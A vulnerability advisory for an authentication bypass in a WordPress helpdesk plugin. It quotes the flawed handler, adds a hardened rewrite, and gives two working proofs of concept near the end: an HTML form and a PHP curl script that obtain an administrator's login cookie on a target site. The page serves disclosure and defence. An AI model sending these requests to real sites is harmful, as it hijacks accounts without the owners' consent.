10-01-2017 / Vulnerabilities

WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation

Any visitor can log in as any existing user, including an administrator, without knowing the password. The loginGuestFacebook admin-ajax handler takes the username straight from the POST body and calls wp_set_auth_cookie() for whichever account it resolves to; there is no nonce, password or Facebook token check in between.

File: wp-support-plus-responsive-ticket-system\includes\admin\loginGuestFacebook.php

<?php 
if($_POST['email']=='') die(); // the only check: the email field must be non-empty
$user_id = username_exists( $_POST['username'] ); // attacker-chosen username resolved to an existing account
if(!$user_id){
	$user_id=email_exists($_POST['email']);
	if(!$user_id){
		$random_password = wp_generate_password( $length=12, $include_standard_special_chars=false );
		$user_id= wp_create_user( $_POST['username'], $random_password, $_POST['email'] );
		$full_name=explode(' ', $_POST['name']);
		$firstName=(isset($full_name[0]))?$full_name[0]:'';
		$lastName=(isset($full_name[1]))?$full_name[1]:'';
		wp_update_user(
			array(
			'ID' => $user_id,
			'first_name'=>$firstName,
			'last_name'=>$lastName,
			'display_name' => $_POST['name'],
			'role' => 'subscriber'
			)
		);
	}
}
$user_info = get_userdata($user_id);
if ( !is_user_logged_in() ) {
	wp_set_current_user( $user_id, $user_info->user_login );
	wp_set_auth_cookie( $user_id ); // auth cookie issued for whichever user was named in the request
	do_action( 'wp_login', $user_info->user_login );
}
?>
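For comparison, a hardened version of the handler. This is an added example written for this page, not the plugin's own code or the fix shipped in 8.0.0. It assumes the front end posts the Facebook access token it obtained from the Facebook JS SDK as access_token and a WordPress nonce as _ajax_nonce; the parameter names, the nonce action wpsp_fb_login and the user-meta key wpsp_facebook_id are choices made here. The essential change is that the identity comes from Facebook's answer to a server-side Graph API call, never from $_POST, and that an existing account is only logged in when it was linked to that Facebook id at creation time.

```php
<?php
// Hardened replacement for loginGuestFacebook.php (added example, not plugin code).
// Assumed request fields: access_token (from the Facebook JS SDK) and _ajax_nonce.
// The nonce action 'wpsp_fb_login' and meta key 'wpsp_facebook_id' are chosen here.

add_action( 'wp_ajax_nopriv_loginGuestFacebook', 'wpsp_hardened_facebook_login' );
add_action( 'wp_ajax_loginGuestFacebook', 'wpsp_hardened_facebook_login' );

function wpsp_verify_facebook_token( $token ) {
	// Ask Facebook who the token belongs to; identity fields in $_POST are ignored.
	$resp = wp_remote_get( add_query_arg( array(
		'fields'       => 'id,name,email',
		'access_token' => $token,
	), 'https://graph.facebook.com/me' ), array( 'timeout' => 10 ) );
	if ( is_wp_error( $resp ) || 200 !== wp_remote_retrieve_response_code( $resp ) ) {
		return false;
	}
	$me = json_decode( wp_remote_retrieve_body( $resp ), true );
	if ( empty( $me['id'] ) || empty( $me['email'] ) || ! is_email( $me['email'] ) ) {
		return false;
	}
	return $me;
}

function wpsp_hardened_facebook_login() {
	// Stops cross-site POSTs; it does nothing against a visitor who has the nonce,
	// so the identity check below is what actually closes the hole.
	check_ajax_referer( 'wpsp_fb_login', '_ajax_nonce' );

	if ( is_user_logged_in() ) {
		wp_send_json_error( 'already logged in', 400 );
	}
	$token = isset( $_POST['access_token'] ) ? (string) $_POST['access_token'] : '';
	$me    = $token ? wpsp_verify_facebook_token( $token ) : false;
	if ( ! $me ) {
		wp_send_json_error( 'invalid Facebook token', 403 );
	}

	// Existing accounts are logged in only if this Facebook id was linked to them.
	// An account that merely matches a username or e-mail address (an administrator's,
	// say) is never logged in from here.
	$users = get_users( array(
		'meta_key'   => 'wpsp_facebook_id',
		'meta_value' => $me['id'],
		'number'     => 1,
		'fields'     => 'ID',
	) );
	if ( $users ) {
		$user_id = (int) $users[0];
	} else {
		if ( email_exists( $me['email'] ) ) {
			wp_send_json_error( 'an account with this e-mail exists; log in with your password', 403 );
		}
		$full_name = explode( ' ', (string) $me['name'], 2 );
		$user_id   = wp_insert_user( array(
			'user_login'   => sanitize_user( 'fb_' . $me['id'], true ), // derived, not attacker-chosen
			'user_pass'    => wp_generate_password( 24, true ),
			'user_email'   => sanitize_email( $me['email'] ),
			'display_name' => sanitize_text_field( $me['name'] ),
			'first_name'   => sanitize_text_field( $full_name[0] ),
			'last_name'    => isset( $full_name[1] ) ? sanitize_text_field( $full_name[1] ) : '',
			'role'         => 'subscriber',
		) );
		if ( is_wp_error( $user_id ) ) {
			wp_send_json_error( $user_id->get_error_message(), 500 );
		}
		update_user_meta( $user_id, 'wpsp_facebook_id', $me['id'] );
	}

	$user = get_userdata( $user_id );
	wp_set_current_user( $user_id, $user->user_login );
	wp_set_auth_cookie( $user_id );
	do_action( 'wp_login', $user->user_login, $user );
	wp_send_json_success( array( 'user' => $user->user_login ) );
}
```

The Graph call proves the token is valid for some Facebook user; if the site also needs to prove it was issued to its own app, add a debug_token call with the app id and secret before trusting the result. Note also that do_action( 'wp_login' ) is passed both the login name and the WP_User object, which is the signature current WordPress hooks expect.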

Proof of Concept

Use the form below, with the action pointed at the target site (http://wp here):

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Submitting it makes WordPress set an authentication cookie for that user in the browser; open /wp-admin/ afterwards and you are logged in as the administrator.
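The same request as a command-line check, added here for this page and not part of the original advisory. It sends the POST the form sends and reports whether the response carries a wordpress_logged_in_ cookie, which is what wp_set_auth_cookie() emits; a site that answers without one is either patched or not running the handler. It assumes PHP's curl extension and is run as php poc.php http://wp administrator.

```php
<?php
// Added PoC helper (not part of the original advisory): repeats the form POST and
// checks the response headers for a WordPress login cookie.
// Assumes ext-curl. Usage: php poc.php http://wp administrator

function has_wp_login_cookie( $raw_headers ) {
	// A successful wp_set_auth_cookie() sets wordpress_logged_in_<hash>=...
	return (bool) preg_match( '/^set-cookie:\s*wordpress_logged_in_/mi', $raw_headers );
}

function try_login_as( $base, $username ) {
	$ch = curl_init( rtrim( $base, '/' ) . '/wp-admin/admin-ajax.php' );
	curl_setopt_array( $ch, array(
		CURLOPT_POST           => true,
		CURLOPT_POSTFIELDS     => http_build_query( array(
			'action'   => 'loginGuestFacebook',
			'username' => $username,
			'email'    => 'sth', // any non-empty value passes the handler's only check
		) ),
		CURLOPT_HEADER         => true,  // keep response headers so Set-Cookie is visible
		CURLOPT_RETURNTRANSFER => true,
		CURLOPT_FOLLOWLOCATION => false, // the cookie is set on the first response
	) );
	$resp = curl_exec( $ch );
	if ( false === $resp ) {
		curl_close( $ch );
		return null; // transport error
	}
	$header_size = curl_getinfo( $ch, CURLINFO_HEADER_SIZE );
	curl_close( $ch );
	return has_wp_login_cookie( substr( $resp, 0, $header_size ) );
}

if ( PHP_SAPI === 'cli' && isset( $argv[2] ) ) {
	$result = try_login_as( $argv[1], $argv[2] );
	if ( null === $result ) {
		echo "request failed\n";
	} elseif ( $result ) {
		echo "VULNERABLE: wordpress_logged_in_ cookie issued for {$argv[2]}\n";
	} else {
		echo "no login cookie returned\n";
	}
}
```

CURLINFO_HEADER_SIZE is used to cut the headers off the body rather than splitting on the first blank line, so an intermediate 100 Continue block does not hide the Set-Cookie header.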

Timeline

  • 06-12-2016: Discovered
  • 06-12-2016: Could not reach the vendor
  • 08-01-2017: Version 8.0.0 released, issue resolved